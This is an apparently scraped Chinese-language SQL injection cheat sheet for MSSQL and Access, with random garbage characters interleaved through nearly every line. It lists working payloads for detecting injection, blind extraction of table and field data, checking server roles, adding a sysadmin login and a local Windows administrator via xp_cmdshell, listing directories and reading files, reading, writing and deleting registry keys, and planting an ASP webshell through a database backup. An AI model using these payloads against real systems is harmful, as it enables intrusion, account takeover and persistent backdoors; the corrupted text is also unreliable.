1.判断是否有注入;and 1=1 ;and 1=2 �f&]� !;)
2.初步判断是否是mssql ;and user>0 j�4=�\��MK
;LKYA?=�/V
3.注入参数是字符'and [查询条件] and ''=' ��x�&EMg!�
rO/Sj�<�0^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 0}�9��j��l
X]Go�dqL\
5.判断数据库系统 �6W;`}�'ap
k%s,�(2)30
;and (select count(*) from sysobjects)>0 mssql {�!��.�w}�
O\%0D.HE�z
;and (select count(*) from msysobjects)>0 access v�&f\ J�v7
<f�MQ��#No
zP c54��>f
PVmeP�gF
�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 yy3`E}vX�7
�F2�)K�AIl
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �9u�3P>a~b
%�\!�0�*(8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -`t9@1P>
=
e?��]H�Ny�
9.(1)猜字段的ascii值(access) *r!qxiY=
r
�3�z"%ht~;
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 T[cJ������
9}q)AL�-ga
(2)猜字段的ascii值(mssql) ~)�ysEZl�
PklJU:Pu\U
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 d�9�T:0A`M
�5�.kKg=a�
10.测试权限结构(mssql) %[��o($�a$
'#QZhz(�+
!y�2yS/���
#TeAw�<2U�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- e�qW�s(`��
TA�#�pA(k�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- h� 3� � J&
Q��,ZV �C�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- n#
Fk�gXP$
.�_.Q��f<7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Yb:F,d�-Ya
�swLNN�A.�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 'Q��.�5`�o
0�AhUH|��]
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- k#p6QA��hS
�'�RV w�xd
;and 1=(select IS_MEMBER('db_owner'));-- A43[��i@�o
K��c>��Rd
�p DU+(A4>
VArMFP)cz�
11.添加mssql和系统的帐户 )"�E1/�$*k
�%G�M�CyT�
;exec master.dbo.sp_addlogin username;-- C
M��GDg�}
;exec master.dbo.sp_password null,username,password;-- +)_��DaL
E
:8?l=B9("g
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- /6��y;��fx
�V[7�D4r.j
;exec master.dbo.xp_cmdshell 'net user username password A\.{(,;k�p
I��3}I7oc_
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- [Qqss8�a�
�ZiaF�ByLy
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ,�z+n@sUR:
#2�10 Yp�#
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ^Q!A4��qOQ
&u��(pBr8B
8Q�kw�g�]X
OY!WEP$F-C
12.(1)遍历目录 ydE�}.0�zN
jd}~#:FUr*
;create table dirs(paths varchar(100), id int) #V�Z
js`d6
y�k��xAm\O
;insert dirs exec master.dbo.xp_dirtree 'c:\' I.%E�YA�ai
�z07:E>�D]
;and (select top 1 paths from dirs)>0 ?U2 �'L�2y
�Ir5E*op7D
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) SzUH6|=.R=
xp]9�Z]J1l
=^)$my\C:�
vOtI�LL��6
(2)遍历目录 >�V�>GiSni
%V#�? 1�{
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �}r�W�g�']
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 DMKtTt��[}
JDO��n`7!w
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �Z)}2�bJwA
�0}g~69Z1=
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %e+�*&Z',�
F$O�$�Y�[�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 &NI\<C7_Gw
�}CrWm�Ju0
i=V2�
/W}
w@a|_?��
13.mssql中的存储过程 ')(�U<5y�)
��acj-*I��
xp_regenumvalues 注册表根键, 子键 �3�u,B���<
M� �L7�vP�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 +\>op,_9I�
>U]KPL[�%�
xp_regread 根键,子键,键值名 TA~ZN^x�I
k#8E9/�t�@
;exec xp_regread GB)<� 5I�
w)/~Gn�676
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 y%<C�kgZS
NA#,�q �8�
xp_regwrite 根键,子键, 值名, 值类型, 值 �ZR�FHs>�0
1�_M}�Dc+J
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 6�� 8�Vx�y
i�Y5V4G�bo
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !�3z
�;u8W
z<9Ll�ew^e
xp_regdeletevalue 根键,子键,值名 -N��A2+].
�� g��q}�c
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !�y$+RA�7\
8<=�sU�O��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��b]��N&4t
�R|_._Btu!
y��
QGd�<(
A5�sz�[��k
14.mssql的backup创建webshell y�I%q3lB}^
N�c�?�'}�,
use model �4Wa�*P�cj
n`T�4P$pt�
create table cmd(str image); ZM��[Z9/S8
WDt�6{��5T
insert into cmd(str) values (''); h�]j>��S�
x_w�We��>0
backup database model to disk='c:\l.asp'; |ZOd�fr4uW
�<@Y`RqV�+
��e�A�G)+b
f5/�s�+H!�
15.mssql内置函数 as[! 9tB]�
F#.�ph��?W
;and (select @@version)>0 获得Windows的版本号 '@HCwEu��z
*<X*)A�{�C
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �|n~,�{�=�
Mu�6DT�p~k
;and (select user_name())>0 爆当前系统的连接用户 >G As&\4hs
9�q\_��UbF
;and (select db_name())>0 得到当前连接的数据库 �CW]Th-xc
�@�R�(Op|9
A>�_,tt��
Y)�l=r^Ap>
16.简洁的webshell �i�4&V+h"�
]<C]&�03))
use model 1Afy$It�/{
��,
Y�l�S
create table cmd(str image); �aDu[i�aZ
n98s�Y+$-z
insert into cmd(str) values (''); eDv�h�3Y<D
��32`Z3�-�
backup database model to disk='g:\wwwtest\l.asp';
